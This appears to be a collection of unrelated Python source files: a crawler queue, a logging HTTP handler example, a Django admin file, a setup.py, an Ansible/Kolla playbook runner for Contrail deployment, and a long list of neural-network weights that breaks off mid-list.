from multiprocessing import Queue from urlobj import URLObj import logging class WorkQueue(): def __init__(self): # Specify maxsize when multithreading. self.queue = Queue() self.loaded = False # Semantics: # Puts 'urlo' into the queue. If there's no free space, it will block # until there is free space. def enqueue(self, urlo): self.queue.put(urlo, True) # Semantics: # Gets a urlobj from the queue. If there's nothing in the queue, it will # block until there's something there. I don't expect this to block # very often. def dequeue(self): return self.queue.get(True) def empty(self): return self.queue.empty() # Only called if we have an exception; writes the queue out to a file. def dump(self): logging.info("Dumping queue") with open('queuedsites.txt', 'w') as f: while not self.empty(): u = self.dequeue() f.write('{}<>{}<>{}<>{}<>{}<>{}\n'.format(u.url, u.xhash, u.status_code, u.timedout, u.to_enqueue, u.is_domain)) # Only called at the beginning; assumes we were interrupted in the middle of a run. def load(self): logging.info("Loading queue") with open('queuedsites.txt', 'r') as f: for line in f: line = line.strip().split('<>') if not line: continue # XXX Sometimes we have lines that aren't all the data from the URLObj? elif len(line) < 6: logging.warn("Found queued URL with less than 6 params: {}".format(line[0])) continue u = URLObj(line[0]) u.xhash = line[1] u.status_code = int(line[2]) u.timedout = bool(line[3]) u.to_enqueue = bool(line[4]) u.is_domain = bool(line[5]) self.enqueue(u) self.queue.loaded = True
python
""" Example logger file. I've found this doesn't work on bluehost, unless you set up the handler thus: http_handler = logging.handlers.HTTPHandler( 'example.com', 'http://example.com/path_to_logger/api_upload?key=test&other_keys...', method='GET', ) """ import logging import logging.handlers logger = logging.getLogger() http_handler = logging.handlers.HTTPHandler( 'localhost:5000', '/api_upload?key=test&project_id=0&submitter=me&[email protected]', method='GET', ) http_handler.setLevel(logging.DEBUG) # probably not a good idea... logger.addHandler(http_handler) logger.debug('Test of debug level.') logger.info('Test of info level.') logger.warning('Test of warning level.') logger.error('Test of error level.') logger.critical('Test of critical level.')
python
#!/usr/bin/env python3 def main(): """Checks if there's enough free memory in the computer.""" main()
python
from django.contrib import admin from .models import * admin.site.register(Usuario) admin.site.register(Media) admin.site.register(Ramo) admin.site.register(Cliente) admin.site.register(Colaborador) admin.site.register(Pedido) admin.site.register(Solicitacao) admin.site.register(Post)
python
from setuptools import setup, find_packages entry_points = """ [console_scripts] autowheel = autowheel.autowheel:main """ setup(name='autowheel', version='0.1.dev0', description='Automatically build wheels from PyPI releases', long_description=open('README.rst').read(), install_requires=['click', 'cibuildwheel', 'requests', 'pyyaml'], author='Thomas Robitaille', author_email='[email protected]', license='BSD', url='https://github.com/astrofrog/autowheel', entry_points=entry_points, packages=find_packages())
python
import os import sys import urllib import multiprocessing import ConfigParser import tempfile import yaml import re from collections import namedtuple from ansible.parsing.dataloader import DataLoader from ansible.vars import VariableManager from ansible.inventory import Inventory from ansible.executor.playbook_executor import PlaybookExecutor from ansible.utils.display import Display from sm_ansible_utils import * from sm_ansible_utils import _valid_roles from sm_ansible_utils import _inventory_group from sm_ansible_utils import _container_names from sm_ansible_utils import SM_STATUS_PORT from sm_ansible_utils import STATUS_IN_PROGRESS from sm_ansible_utils import STATUS_VALID from sm_ansible_utils import STATUS_SUCCESS from sm_ansible_utils import STATUS_FAILED sys.path.append(os.path.join(os.path.dirname(__file__), '..')) from server_mgr_logger import ServerMgrlogger as ServerMgrlogger # wrapper class inspired from # http://docs.ansible.com/ansible/developing_api.html # This class runs openstack playbooks followed by contrail ansible playbooks to # deploy openstack and contrail nodes in sequence. class ContrailAnsiblePlaybooks(multiprocessing.Process): def __init__(self, json_entity, args): super(ContrailAnsiblePlaybooks, self).__init__() try: self.logger = ServerMgrlogger() except: f = open("/var/log/contrail-server-manager/debug.log", "a") f.write("Ansible Callback Init - ServerMgrlogger init failed\n") f.close() #Initialize common stuff self.json_entity = json_entity self.args = args self.hosts_in_inv = json_entity[0]["hosts_in_inv"] if "kolla_inv" in json_entity[0]["parameters"]: self.hosts_in_kolla_inv = \ SMAnsibleUtils(self.logger).hosts_in_kolla_inventory(\ json_entity[0]['parameters']['kolla_inv']) self.tasks = re.split(r'[,\ ]+', json_entity[0]["tasks"]) #Initialize vars required for Ansible Playbook APIs self.options = None self.extra_vars = None self.pbook_path = None self.var_mgr = None self.inventory = None self.pb_executor = None def update_status(self, kolla=False): if kolla: hosts = self.hosts_in_kolla_inv else: hosts = self.hosts_in_inv for h in hosts: status_resp = { "server_id" : h, "state" : self.current_status } SMAnsibleUtils(self.logger).send_REST_request(self.args.ansible_srvr_ip, SM_STATUS_PORT, "ansible_status", urllib.urlencode(status_resp), method='PUT', urlencode=True) def validate_provision_params(self, inv, defaults): keys_to_check = ["ansible_playbook", "docker_insecure_registries", "docker_registry_insecure"] params = inv.get("[all:vars]", None) if params == None: return ("[all:vars] not defined") for x in keys_to_check: if not x in params.keys(): if x == "docker_insecure_registries": params['docker_insecure_registries'] = \ defaults.docker_insecure_registries elif x == 'docker_registry_insecure': params['docker_registry_insecure'] = \ defaults.docker_registry_insecure elif x == 'ansible_playbook': params['ansible_playbook'] = \ defaults.ansible_playbook else: return ("%s not defined in inventory" % x) for k,v in vars(defaults).iteritems(): if not k in params.keys(): params[k] = v pbook = params['ansible_playbook'] try: with open(pbook) as file: pass except IOError as e: return ("Playbook not found : %s" % pbook) return STATUS_VALID def create_kolla_param_files(self, pw, glbl, pbook_dir): self.logger.log(self.logger.INFO,"Changing globals and passwords files") pw_file_name = pbook_dir + '/../etc/kolla/passwords.yml' try: with open(pw_file_name) as kolla_pws: #SMAnsibleUtils(self.logger).merge_dict(pw, yaml.load(kolla_pws)) self.logger.log(self.logger.INFO, "Creating %s" % (pw_file_name)) except IOError as e : self.logger.log(self.logger.INFO, "%s : Creating %s" % (e, pw_file_name)) finally: with open(pw_file_name, 'w+') as kolla_pws: yaml.dump(pw, kolla_pws, explicit_start=True, default_flow_style=False, width=1000) gl_file_name = pbook_dir + '/../etc/kolla/globals.yml' try: with open(gl_file_name) as kolla_globals: #SMAnsibleUtils(self.logger).merge_dict(glbl, # yaml.load(kolla_globals)) self.logger.log(self.logger.INFO, "Creating %s" % (gl_file_name)) except IOError as e : self.logger.log(self.logger.INFO, "%s : Creating %s" % (e, gl_file_name)) finally: with open(gl_file_name, 'w+') as kolla_globals: yaml.dump(glbl, kolla_globals, explicit_start=True, default_flow_style=False, width=1000) def run_playbook(self, pb, kolla, action): cluster_id = self.json_entity[0]["cluster_id"] parameters = self.json_entity[0]["parameters"] self.pbook_path = parameters[pb] pbook_dir = os.path.dirname(self.pbook_path) inv_dir = pbook_dir + '/inventory/' ev = None no_run = parameters["no_run"] try: if kolla: inv_file = inv_dir + cluster_id + "_kolla.inv" inv_dict = parameters["kolla_inv"] kolla_pwds = parameters['kolla_passwords'] kolla_vars = parameters['kolla_globals'] self.create_kolla_param_files(kolla_pwds, kolla_vars, pbook_dir) ev = { 'action': action } with open(pbook_dir + '/../etc/kolla/globals.yml') as info: ev.update(yaml.load(info)) with open(pbook_dir + '/../etc/kolla/passwords.yml') as info: ev.update(yaml.load(info)) else: inv_file = inv_dir + cluster_id + ".inv" inv_dict = parameters["inventory"] self.current_status = self.validate_provision_params(inv_dict, self.args) Options = namedtuple('Options', ['connection', 'forks', 'module_path', 'become', 'become_method', 'become_user', 'check', 'listhosts', 'listtasks', 'listtags', 'syntax', 'verbosity', 'extra_vars']) self.options = Options(connection='ssh', forks=100, module_path=None, become=True, become_method='sudo', become_user='root', check=False, listhosts=None, listtasks=None, listtags=None, syntax=None, verbosity=None, extra_vars=ev) self.logger.log(self.logger.INFO, "Creating inventory %s for playbook %s" % (inv_file, self.pbook_path)) SMAnsibleUtils(None).create_inv_file(inv_file, inv_dict) self.logger.log(self.logger.INFO, "Created inventory %s for playbook %s" % (inv_file, self.pbook_path)) if no_run: return self.var_mgr = VariableManager() self.inventory = Inventory(loader=DataLoader(), variable_manager=self.var_mgr, host_list=inv_file) self.var_mgr.set_inventory(self.inventory) if kolla: self.var_mgr.extra_vars = ev self.pb_executor = PlaybookExecutor(playbooks=[self.pbook_path], inventory=self.inventory, variable_manager=self.var_mgr, loader=DataLoader(), options=self.options, passwords={}) self.logger.log(self.logger.INFO, "Starting playbook %s" % self.pbook_path) # Update status before every playbook run if kolla: self.current_status = "openstack_" + action else: self.current_status = action self.update_status(kolla) rv = self.pb_executor.run() if rv != 0: self.current_status = STATUS_FAILED self.update_status(kolla) self.logger.log(self.logger.ERROR, "Playbook Failed: %s" % self.pbook_path) rv = None else: rv = self.pb_executor._tqm._stats except Exception as e: self.logger.log(self.logger.ERROR, e) self.current_status = STATUS_FAILED self.update_status(kolla) rv = None return rv def run(self): self.logger.log(self.logger.INFO, "Executing Ansible Playbook Actions: %s" % self.tasks) if 'openstack_bootstrap' in self.tasks: rv = self.run_playbook("kolla_bootstrap_pb", True, "bootstrap-servers") if rv == None: return rv if 'openstack_deploy' in self.tasks: rv = self.run_playbook("kolla_deploy_pb", True, "deploy") if rv == None: return rv if 'openstack_post_deploy' in self.tasks: rv = self.run_playbook("kolla_post_deploy_pb", True, "post-deploy") if rv == None: return rv if 'openstack_destroy' in self.tasks: rv = self.run_playbook("kolla_destroy_pb", True, "destroy") if rv == None: return rv if 'contrail_deploy' in self.tasks: rv = self.run_playbook("contrail_deploy_pb", False, "contrail-deploy") if rv == None: return rv # This has to happen after contrail_deploy if 'openstack_post_deploy_contrail' in self.tasks: rv = self.run_playbook("kolla_post_deploy_contrail_pb", True, "post-deploy-contrail") if rv == None: return rv
python
bot0_wieght_layer_one = [[0.4935829386124425, 0.2486496493340803, 0.45287661299189763, 0.6228461025230169, 0.0027775129778663254, 0.1708073345725104, 0.519667083534109, 0.23366912853189226, 0.6139798605829813, 0.5293127738090753, 0.6567206010553531, 0.7435351945616345, 0.7015167444631532, 0.14995488489543307, 0.49757715012556913, 0.6467561172865255, 0.9212538365848113, 0.9464065946119674, 0.1494875222787766, 0.9374752317574573, 0.8777464069792369, 0.24138691456024552, 0.7659384349754291, 0.23907929821233243, 0.1974608268069732, 0.10894582625681126, 0.29590811102063685, 0.2755027447113222, 0.5714771489142544, 0.6741393616198518, 0.27276833671926914, 0.40956050296998925, 0.5601713861500712, 0.3977876756089196, 0.6860214004559976, 0.34268073370731345, 0.2214141828696149, 0.2591938889185762, 0.2531258881187268, 0.8684768630107501, 0.17145384500261585, 0.22703094455185646, 0.22988958138771332, 0.28257358113352504, 0.23236230350846399, 0.6778707921299, 0.6800663866609751, 0.10922044222693428, 0.5533836878503431, 0.18017517533780059, 0.4377719059983647, 0.9288555179080915, 0.9895973711676155, 0.5207299338191543, 0.7816416008332766, 0.8033630042935214, 0.2949120458711081, 0.9395350494922458, 0.5452844974969201, 0.18828673666741158, 0.3556973847723065, 0.48373068150432974, 0.5933519209117005, 0.6607122209252013, 0.8244201515622804, 0.7964115959146899, 0.3874983399168205, 0.5416066464002153, 0.8208004891451057, 0.6645576910224514, 0.6876020881680511, 0.45938928779923693, 0.6717717630348377, 0.16179056884149523, 0.4357248259091525, 0.4715875608302854, 0.1272244208695038, 0.7821650215339843, 0.5685604479312912, 0.37968938378518224, 0.9493607211090185, 0.2130838160830899, 0.26713485063249787, 0.535787068877412, 0.01264876309930607, 0.6698989857156539, 0.3977478318725206, 0.45957628269449735, 0.6914270807135725], [0.7193637876414529, 0.0992370467088417, 0.9553963535264431, 0.07349401110719789, 0.14649143977623225, 0.1349818835701132, 0.31070206117356125, 0.8273054256746405, 0.7927523497649491, 0.14898648772530132, 0.3431433649663693, 0.7584252555947238, 0.07138219505921417, 0.7982261554220401, 0.5969487571193092, 0.7116252207283739, 0.06908825367375071, 0.5029014967375591, 0.7232649520612549, 0.5126898591039302, 0.26277738837470743, 0.01938268160513401, 0.11517287833510681, 0.9213610625703276, 0.7532821937865147, 0.0030724783216599105, 0.5776485433220746, 0.04222852125489707, 0.5160244705250624, 0.16879757444696852, 0.14372495242428995, 0.2430342230586282, 0.9504957276394339, 0.9318008865656332, 0.14053527002616661, 0.039456272235465106, 0.7661393635325146, 0.8340559897373588, 0.8228836411797477, 0.13344361369477764, 0.5882990207970006, 0.2491980635558816, 0.5689985109623916, 0.27492406765221833, 0.972985313727772, 0.5459795617278855, 0.1517859370942427, 0.9327882617192113, 0.10270045453581511, 0.5754703833904119, 0.31389666323349485, 0.6644559957621139, 0.001369498203934283, 0.2418890569039206, 0.5853723046789586, 0.3449096652651481, 0.49202949283135167, 0.5198238199109231, 0.5909363956617113, 0.21658291103098126, 0.17180674994524825, 0.8283196587280093, 0.4874484763898551, 0.6827234220428773, 0.2161710054730458, 0.4558301101165271, 0.4559599226653992, 0.24840691676792048, 0.3619063394969213, 0.1967413337317815, 0.6504305538704975, 0.40937850135244747, 0.3389617844371956, 0.7508287044495914, 0.5301956779511247, 0.2661240219568354, 0.5093468383541764, 0.587679942584075, 0.9524792119580612, 0.7804517256199596, 0.7638572895572304, 0.7662360273323294, 0.6187785808885176, 0.7135688938462813, 0.7392352347465704, 0.09103694597008893, 0.4982498867230458, 0.23109479445040293, 0.2821689253684987], [0.6307617053678217, 0.5039768955610341, 0.49688494110612225, 0.233248088660867, 0.8611032914321372, 0.995195135988468, 0.0849380582957151, 0.8204164779863392, 0.36646458658504966, 0.34331646333650834, 0.2230130181447716, 0.9179849442046781, 0.45633296658757483, 0.9375850657995864, 0.22980780108971255, 0.4449945646771951, 0.14519144694104857, 0.6820733220059508, 0.23004413430220172, 0.33232001354222684, 0.9914225389113916, 0.23343443636343075, 0.5292096497593496, 0.36458139641715326, 0.25843801690928736, 0.9183184242563015, 0.49968017398211506, 0.7791952792855735, 0.5771798199343583, 0.834773325230387, 0.158486962686607, 0.9321124693197719, 0.47991120203491633, 0.00355305455109034, 0.7541318706217435, 0.4523223838480157, 0.5720577659529087, 0.7178140987736153, 0.7131922781863729, 0.8801487642262241, 0.831230070306996, 0.765348729576048, 0.9859758441926465, 0.09592909415269191, 0.32629146879764814, 0.5692665970088389, 0.9246097779483797, 0.2795565950165342, 0.239727498643875, 0.10371267545976004, 0.3061994511275228, 0.8895000028399908, 0.41275819255722945, 0.20918068323940497, 0.9847102077342237, 0.15231664837576142, 0.44196475121426115, 0.6545234911619475, 0.4058345087343399, 0.5747518701252684, 0.12988783108698232, 0.19180937677963128, 0.9969572094336052, 0.20766881687737793, 0.006968626661159494, 0.020775547418627305, 0.44569050307806346, 0.4581111327905286, 0.9015444263189981, 0.06349318827967398, 0.8150709815870101, 0.25593581891438044, 0.526041725095255, 0.6467238688319615, 0.03816486866961433, 0.03720944439521279, 0.5817414059838383, 0.34452234951971183, 0.21890071128992916, 0.36649741728793583, 0.0726963263369732, 0.17968363978040258, 0.6004827139014633, 0.4672035234869465, 0.18079269935538467, 0.4508015188204938, 0.5016796189632033, 0.7375660536611205, 0.7020508381468571], [0.8084796921459246, 0.27384435108470273, 0.04828876067981014, 0.07379447508827885, 0.0634108087420916, 0.38898621921409327, 0.1975682335792437, 0.9277433137720225, 0.4083270100245886, 0.8075504540560292, 0.8784568942912847, 0.4076827922104673, 0.49354254143539655, 0.3571369822502426, 0.8979031458841475, 0.564765561543932, 0.5949020939365928, 0.903108586137933, 0.39225531985484785, 0.9947503812885181, 0.8994092905858401, 0.01212376297070672, 0.19562268718123987, 0.6650875457560252, 0.6196172020152799, 0.4951005095683715, 0.5456969665769195, 0.4704651880528081, 0.5423633232108106, 0.658789852304124, 0.15629908018189764, 0.51998129446808, 0.8386700672339286, 0.508600283133679, 0.619147264631436, 0.5637459268225825, 0.6764104508177909, 0.6430456271248974, 0.6244071412803961, 0.3449575584822505, 0.12761689425008071, 0.6902008573767218, 0.7309553767039909, 0.5791615423447679, 0.8544816081150577, 0.7828211086457072, 0.7360388275155082, 0.7975914095356994, 0.3352701671445214, 0.024702544642475344, 0.41775624527161426, 0.6533780336738035, 0.390605808091781, 0.2947421325289511, 0.5680345674803116, 0.4054081381343654, 0.18911037212318138, 0.07442571380311647, 0.1948931566820159, 0.3843785336151123, 0.5452617701603052, 0.2765672109742833, 0.6498019672515245, 0.07513905717716296, 0.9487728791396083, 0.9558576513915418, 0.6518256962971827, 0.7407995312373189, 0.017609879057417843, 0.31600691785041557, 0.1953804804210122, 0.16784899887419402, 0.7602552995267425, 0.9442077092314616, 0.05750785245504586, 0.3577318868856184, 0.19615509111309404, 0.05255054260591452, 0.556125963219633, 0.039672098132271016, 0.5407592261677879, 0.14510961174947734, 0.8595294806356243, 0.007519941000603159, 0.23134208436579118, 0.009295627659115069, 0.37093073175217983, 0.9755178459945021, 0.6902618683547788], [0.7515916770913621, 0.19076293301681868, 0.9724612308724244, 0.24485048224447148, 0.21776297767506825, 0.6979260099671111, 0.6262352317845318, 0.396331360047384, 0.37139235519485436, 0.6857600987954712, 0.8760528855940635, 0.7093571083789698, 0.45132233953038925, 0.07189694392471246, 0.33863587068005996, 0.11579690461650582, 0.45013539278377446, 0.34541303911605425, 0.9221230982016599, 0.2905400473664146, 0.24727262997549604, 0.9870200589036876, 0.9084944322018474, 0.7242701978048289, 0.4659345439649095, 0.8660442364919892, 0.8098616675802133, 0.7388936586997712, 0.018736126705306888, 0.5353097532136029, 0.8923493688264574, 0.2052888473077552, 0.44456706342205476, 0.8590036849696138, 0.02897542662910524, 0.10163304116852212, 0.3007604746545479, 0.33643848583124947, 0.9456454702189252, 0.5903693067189846, 0.2954408452960273, 0.38338738824239516, 0.376853763925345, 0.9743909557268259, 0.4545644898979583, 0.8150166089174296, 0.4703057345359518, 0.3121470342307563, 0.0794768278722564, 0.5597112784531169, 0.3861810059301165, 0.026008490169801113, 0.8893971474684071, 0.2000975269082993, 0.7894632707819295, 0.764386236417529, 0.28096685288930157, 0.6964626379563548, 0.4634682569744447, 0.6771319255007053, 0.6993217238532895, 0.02043804303912955, 0.6949305007936956, 0.36262517601094235, 0.5055131343837771, 0.02258293509529019, 0.6556601979412826, 0.19680608294757218, 0.02743764736784493, 0.02969007648043498, 0.1372985596271562, 0.8193774049370306, 0.15997440351459458, 0.6358339070318642, 0.5779272113926737, 0.6727105093776348, 0.4896078388766417, 0.7866559504612134, 0.11260240929990262, 0.2770521740041859, 0.6424684466014499, 0.41254606191261567, 0.4487637282821766, 0.11863081520464314, 0.5532506065793558, 0.5450635551026698, 0.8816355400542084, 0.48472093020171003, 0.32569399187823744], [0.6206390788465699, 0.15779237637789612, 0.21131516025631103, 0.4181091020583977, 0.7187169078015069, 0.25660608387264994, 0.7629877733711614, 0.8242310164104012, 0.7186012070853081, 0.8810107738386127, 0.2786977575452376, 0.7856727332845536, 0.46760242349383296, 0.3901399212854706, 0.6600874926899676, 0.5307039766574495, 0.43637800915700586, 0.8230846676622585, 0.5136284517330398, 0.6925308821867903, 0.6667245042172921, 0.3733928159072639, 0.2629739630344372, 0.2676959086077685, 0.9786531225694579, 0.6918954569467168, 0.6984135381664444, 0.23932646582781236, 0.7813009207359639, 0.8952541144588478, 0.9878652314824834, 0.7662646400885289, 0.4880895313996474, 0.34422975171596926, 0.48045763268994646, 0.8531853356443303, 0.34948862847711215, 0.5532718561129788, 0.7237406705693429, 0.6423426398961657, 0.5367442637567288, 0.9930495395476565, 0.5812265566655564, 0.8834030149496938, 0.5089176613300826, 0.5570859934245764, 0.327970177402934, 0.27108400010835576, 0.5385052092078001, 0.010172494401844312, 0.2941161377984163, 0.3566274380039244, 0.6417611976665807, 0.015233035749627422, 0.15432959719251482, 0.7755262553901066, 0.032389772688557805, 0.06806606718510955, 0.08995097665279084, 0.4390303036116959, 0.40775487648065567, 0.06191776180827602, 0.032239488086460044, 0.0465809472880544, 0.05306952361507633, 0.702227484395934, 0.20119202751844378, 0.6164153918528726, 0.837723562947728, 0.8479572657761094, 0.796053685229654, 0.10772590325258236, 0.9474396938854628, 0.7736585883287718, 0.5438552214806078, 0.3383450470804178, 0.7179972926794828, 0.043455353113848516, 0.07307430768150946, 0.562889225083367, 0.6889954260785377, 0.8614408593018704, 0.5115537714815056, 0.4968824244996112, 0.46983558129631464, 0.17744032179201075, 0.5907495142815318, 0.9195933831314489, 0.8735276724592762], [0.0546289083365703, 0.558349663042936, 0.15825535553513181, 0.9618931212394518, 0.8872542678975858, 0.5127525207563902, 0.5457354463589071, 0.2700125118284086, 0.3013639442808279, 0.5325217166520552, 0.9077326637168593, 0.6757894178859548, 0.3381877977879265, 0.6551205097042354, 0.05590749788383742, 0.5932361454972053, 0.5498149052212652, 0.8227116797935435, 0.46657840573105436, 0.6563405248201772, 0.540158964519292, 0.37568635362775615, 0.5560951022107695, 0.6302755370353823, 0.22231087579194098, 0.2444999618734689, 0.9831332343113387, 0.5971691598347817, 0.35578808697631326, 0.8193982087721026, 0.7283459464309779, 0.7139739441446002, 0.19418688227724468, 0.30489989756770275, 0.9609736581114511, 0.5544744067506779, 0.7430031641433703, 0.544693263984774, 0.7175315334633071, 0.9915668960320091, 0.12210958461939314, 0.7794151715953662, 0.710388192426428, 0.23539858340069109, 0.41388209624699746, 0.6278347624476572, 0.7717660602832401, 0.03522761704912314, 0.5861845660103372, 0.2684057424863554, 0.03149407644672708, 0.2588168846648018, 0.054137461534030096, 0.35248496541068475, 0.5626731346053994, 0.21015973389136244, 0.1397889183927834, 0.424991922082283, 0.583985614502307, 0.7135488598397892, 0.1534651642055319, 0.5278283431092786, 0.817234291791, 0.6865669475520276, 0.8400956483432387, 0.3553410125422114, 0.5621639344730354, 0.7528983577284845, 0.052279502113401155, 0.24374904182536383, 0.9800338202217856, 0.4537503178299366, 0.9298064153655025, 0.1922793143927708, 0.14169852856764853, 0.210400358988438, 0.5010774881007007, 0.4791754121125693, 0.6096271376656784, 0.6038961372430545, 0.2655827722582237, 0.2849625798378257, 0.2891456987207267, 0.25869681116902743, 0.8402635963808085, 0.597930370104968, 0.4531779957213572, 0.45884061134540544, 0.3200715039313814], [0.6449979181869536, 0.7537087778489473, 0.4355357403684108, 0.1653029528150347, 0.6411699114989015, 0.7894103672482641, 0.49146367396599766, 0.22201564692883125, 0.6758416727855281, 0.6365589752449248, 0.5976223981420056, 0.11397677756033353, 0.8678894794929654, 0.5489149162326091, 0.1320913889326668, 0.1761876377265491, 0.2456472210392775, 0.5071343860460336, 0.12173113138329161, 0.3460573095759334, 0.7932912935281833, 0.40156538892521376, 0.6878982044742583, 0.08788185079316602, 0.967642517000846, 0.3193569798656798, 0.8203692954126408, 0.03330924787218015, 0.5884833942382952, 0.7433823187670109, 0.8994862799322555, 0.32108355294375235, 0.3194039594871573, 0.6551340739044892, 0.032036616022942166, 0.8339182240064208, 0.5578749772339806, 0.7434501811910013, 0.1181786329998249, 0.35567638766996845, 0.15909391248334748, 0.7805318692770543, 0.09201493982939113, 0.7997352788424174, 0.5920601477012399, 0.14332776393780922, 0.16934024262973946, 0.10017601265535336, 0.9136376625583517, 0.82220003509573, 0.2643657238072461, 0.13522021672390594, 0.0854882122753382, 0.8152975531755637, 0.7916282640902562, 0.07074332696930219, 0.3402600433130857, 0.197180017808543, 0.20840594516471267, 0.8312832788707185, 0.6701839726455112, 0.6610886893725066, 0.4871042142318207, 0.12836095160598804, 0.9679120345136163, 0.2735949330763191, 0.38989674721480283, 0.18688513778581262, 0.010522684069685817, 0.435885829221656, 0.11514317725584045, 0.748681302157351, 0.4055849069571943, 0.10176543764214563, 0.7755912387870274, 0.7684358983999376, 0.05205854352667505, 0.5926285117320772, 0.05538559053895897, 0.6705850558653481, 0.525808678150547, 0.015039249988264558, 0.5683648697727853, 0.3152331729103166, 0.8852519201014608, 0.3980075092670442, 0.33327264262547684, 0.1766876281967218, 0.5696903578969622], [0.852855362237091, 0.3489673869003813, 0.060210554520977455, 0.5160672954650956, 0.014806320022740516, 0.618494871970543, 0.42538119636646754, 0.15331757244702304, 0.5830386093601294, 0.3364557699391797, 0.36911857648555835, 0.7258019489442413, 0.5641455202209722, 0.6617181806499098, 0.6825008705530258, 0.2331834335613704, 0.7324970698114482, 0.4688508908581652, 0.5393597344151229, 0.5711567202501522, 0.32168802437252997, 0.5054283902885031, 0.6541136461385909, 0.10315805881361151, 0.7942600601996802, 0.7623847692535421, 0.7001011692059321, 0.02393794386395487, 0.7415463101079897, 0.12395013597084592, 0.7830740204350577, 0.7657156610504737, 0.15653996473986698, 0.058401657937124374, 0.4859615161096251, 0.6203415489995264, 0.18231948698111056, 0.6831265428943796, 0.10554251593136443, 0.5966174330203512, 0.10409882425737593, 0.6745510750636352, 0.38708456789893886, 0.031144356044847443, 0.40595073305613627, 0.3824022896388237, 0.03352900725879093, 0.8088597882267266, 0.09861542641380372, 0.2770971576586013, 0.08624006901653025, 0.6225345105641247, 0.6753091873022377, 0.7911677894857897, 0.16016663479353332, 0.8713391780389429, 0.8226006131052581, 0.47691971164364344, 0.8359772768587981, 0.5990128093564864, 0.5496498233061545, 0.12585457660296862, 0.5399810000445523, 0.11999449906891335, 0.3414656460717661, 0.659244818142472, 0.1857382068352479, 0.745757191701968, 0.05655708086692768, 0.4035256197605007, 0.4845712115939569, 0.05106942982466944, 0.18999708692748496, 0.48217218355658464, 0.049974652418595666, 0.41441990127013206, 0.007128582927215854, 0.6371548472680038, 0.958648107475411, 0.4968565956831469, 0.39852466236801365, 0.8374765137840612, 0.9774644328877298, 0.514993251213521, 0.3156588902420381, 0.35399903807564304, 0.4360800416963432, 0.790572793594285, 0.8783760840520749], [0.29209351565102903, 0.2613110568723238, 0.627841790178802, 0.3185240640233834, 0.6107951449096153, 0.7022002536184426, 0.13923415301508346, 0.18696267607052486, 0.0013353016455677214, 0.08427265363918113, 0.04155204306282534, 0.3348230805497767, 0.584541742629576, 0.9775880865690801, 0.684394543366014, 0.9353228955624147, 0.7995931730957554, 0.1910486218472781, 0.19158260697575824, 0.33112647799896855, 0.5597615183085528, 0.07015117133321214, 0.3455216155783575, 0.6353004792958964, 0.8724755009459306, 0.34906760936840076, 0.409831641647302, 0.8137835581688054, 0.2587393141704979, 0.9805340841622704, 0.21201486432551786, 0.1225957557457723, 0.8916889438981283, 0.27607592281051785, 0.02684113718626291, 0.29899698428992905, 0.9518132368989032, 0.8807749712654713, 0.9507555510866927, 0.7038194748248106, 0.921936041622217, 0.28256371323435103, 0.18545867577880437, 0.34048702627610783, 0.9149770577368989, 0.12601100500051865, 0.03686722620988925, 0.4990085782257805, 0.3791274393764785, 0.2807573250122306, 0.4918550796119098, 0.0962404010669694, 0.30395976240341416, 0.7353890109946843, 0.363304751285513, 0.3513317697568624, 0.7264693179845169, 0.044873166048283064, 0.5602841836259258, 0.3562408043414741, 0.8433130591720878, 0.9339705125486716, 0.40814911821063604, 0.028112618653614696, 0.42845019137435747, 0.49908816583149374, 0.6076534743219487, 0.5570706623653796, 0.28248673904186883, 0.8241581828398685, 0.44229271378690704, 0.8805206567290171, 0.2593134086643706, 0.416947604274874, 0.44841108082193715, 0.3484341508883171, 0.11565087472578339, 0.845271017187261, 0.8713685203399029, 0.5536126401296754, 0.307066219685433, 0.5301400044225715, 0.6403258475666596, 0.6943828491384205, 0.8651570373678039, 0.8982271346718131, 0.8436915891812184, 0.5525385212406779, 0.7125795112583939], [0.1081345186656858, 0.13972672795268226, 0.6612190830420255, 0.08003312266113671, 0.5255992460143822, 0.5733613114721169, 0.3763627260853003, 0.8289445265525545, 0.4274037233155472, 0.49067555529421025, 0.5839845772123975, 0.6028366772633202, 0.66733454278173, 0.27361521023098434, 0.3589981325175614, 0.4513673830878183, 0.4384593051098109, 0.8918331719256631, 0.40725033989925086, 0.8034711913719191, 0.18394532562929533, 0.7105834862899493, 0.3525708001013472, 0.7385976429171252, 0.8892383078570366, 0.5653826795081124, 0.7759997670448197, 0.009003702014654835, 0.8323202969103849, 0.24207884095230658, 0.7046742148508904, 0.46738538578613475, 0.8202997097868907, 0.6182311691649204, 0.3583858604833069, 0.8770693135168892, 0.13990386427362678, 0.02618427538017909, 0.9991153968125737, 0.25971563954929566, 0.16173387774691195, 0.6400155308141301, 0.6038255285999398, 0.9438924928993894, 0.7503813205027573, 0.709069610233807, 0.2734666899536081, 0.5452505003359798, 0.8376718283390543, 0.610163129593307, 0.2605550634958167, 0.31202184232010777, 0.1817239355714757, 0.4205493016917996, 0.7891647273583858, 0.9656038032836223, 0.9030128216932363, 0.49517638427559674, 0.26230808332249456, 0.322108142002422, 0.5045095105290113, 0.008813154827022829, 0.6343611248536449, 0.5748081403704774, 0.7139879215681911, 0.5880615856730497, 0.39606126658417495, 0.593234557397728, 0.02991327229997598, 0.6442668348283038, 0.5465556128360536, 0.565482830500383, 0.33607783552203196, 0.17057007877252295, 0.01600464493881837, 0.7420997160934591, 0.5623533041388137, 0.46628939589702745, 0.9275544271450908, 0.716840911571936, 0.4347972587573298, 0.259859383888161, 0.34863697386472736, 0.5578581532726113, 0.6433042031621901, 0.8558142307860244, 0.3796917695178348, 0.31603093694017625, 0.9640383804127571], [0.2209509606434924, 0.7352710873027777, 0.2812177995150251, 0.1527795829798827, 0.943137344275536, 0.28228585423683383, 0.6249360425585961, 0.5731098462035533, 0.6868495897175008, 0.4223622087394393, 0.46043719327949173, 0.27255545391247116, 0.7825619808796317, 0.3375707766927032, 0.3397434184597894, 0.9332332046951965, 0.2863463021484486, 0.4775764666489555, 0.8944469904841221, 0.41528473921694553, 0.6724129142509918, 0.8283123432167213, 0.8560800658654526, 0.28453618777764356, 0.08599001190331457, 0.2998894429999692, 0.040410965394726994, 0.41571348815690645, 0.6559170522804373, 0.4639710057181279, 0.8207416738602958, 0.5432988439491655, 0.3996005791871009, 0.8886347638989692, 0.03257397682622121, 0.43573432395106415, 0.9026969550506334, 0.21562793864337781, 0.7440023550944754, 0.06623095385649902, 0.7553020049469407, 0.90005628516542, 0.010370764944694133, 0.19408850783338671, 0.34436933475889964, 0.7908350479616723, 0.12090884657661738, 0.3300196971390036, 0.9674267494172797, 0.033337933410122256, 0.8992483459377145, 0.9462808678327074, 0.2503623292156073, 